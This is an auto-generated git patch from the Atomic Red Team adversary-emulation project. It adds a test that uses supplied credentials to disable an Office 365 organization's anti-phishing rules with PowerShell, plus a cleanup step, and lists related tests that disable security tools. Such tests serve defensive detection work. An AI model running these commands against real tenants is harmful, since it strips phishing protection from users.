From e95076c17d316d1e79baf4fd442fb85e828fef24 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 30 Aug 2021 19:16:31 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-office-365.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + atomics/Indexes/index.yaml | 46 +++++++++++++ atomics/T1562.001/T1562.001.md | 65 +++++++++++++++++++ 7 files changed, 116 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index c35e563a..f9a8214d 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json @@ -1 +1 @@ -{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index f12bbbeb..44028ad9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -343,6 +343,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell +defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index bd4769f1..a9f57a20 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -97,6 +97,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh +defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 08c541da..0ab7a8b7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -573,6 +573,7 @@ - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows] - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows] - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] + - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index f364dbbc..49bcc017 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -220,6 +220,7 @@ - Atomic Test #2: Disable Cb Response [linux] - Atomic Test #3: Disable SELinux [linux] - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux] + - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index cb20e020..37676f1b 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -24532,6 +24532,52 @@ defense-evasion: Remove-MpPreference -ExclusionProcess $excludedProcess name: powershell elevation_required: true + - name: office-365-Disable-AntiPhishRule + auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 + description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules + in your office-365 organization. + +' + supported_platforms: + - office-365 + input_arguments: + username: + description: office-365 username + type: String + default: + password: + description: office-365 password + type: String + default: + dependency_executor_name: powershell + dependencies: + - description: 'ExchangeOnlineManagement PowerShell module must be installed + +' + prereq_command: | + $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name ExchangeOnlineManagement + Import-Module ExchangeOnlineManagement + executor: + command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-ExchangeOnline -Credential $creds + $test = Get-AntiPhishRule + Disable-AntiPhishRule -Identity $test.Name -Confirm:$false + Get-AntiPhishRule + cleanup_command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-ExchangeOnline -Credential $creds + $test = Get-AntiPhishRule + Enable-AntiPhishRule -Identity $test.Name -Confirm:$false + Get-AntiPhishRule + name: powershell + elevation_required: false T1078.002: technique: external_references: diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index ba2e2af9..7164b66b 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -52,6 +52,8 @@ - [Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-24---tamper-with-windows-defender-evade-scanning--process) +- [Atomic Test #25 - office-365-Disable-AntiPhishRule](#atomic-test-25---office-365-disable-antiphishrule) +
@@ -996,4 +998,67 @@ Remove-MpPreference -ExclusionProcess $excludedProcess +
+
+ +## Atomic Test #25 - office-365-Disable-AntiPhishRule +Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. + +**Supported Platforms:** Office-365 + + +**auto_generated_guid:** b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | office-365 username | String | | +| password | office-365 password | String | | + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force +$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd +Connect-ExchangeOnline -Credential $creds +$test = Get-AntiPhishRule +Disable-AntiPhishRule -Identity $test.Name -Confirm:$false +Get-AntiPhishRule +``` + +#### Cleanup Commands: +```powershell +$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force +$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd +Connect-ExchangeOnline -Credential $creds +$test = Get-AntiPhishRule +Enable-AntiPhishRule -Identity $test.Name -Confirm:$false +Get-AntiPhishRule +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: ExchangeOnlineManagement PowerShell module must be installed +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name ExchangeOnlineManagement +Import-Module ExchangeOnlineManagement +``` + + + +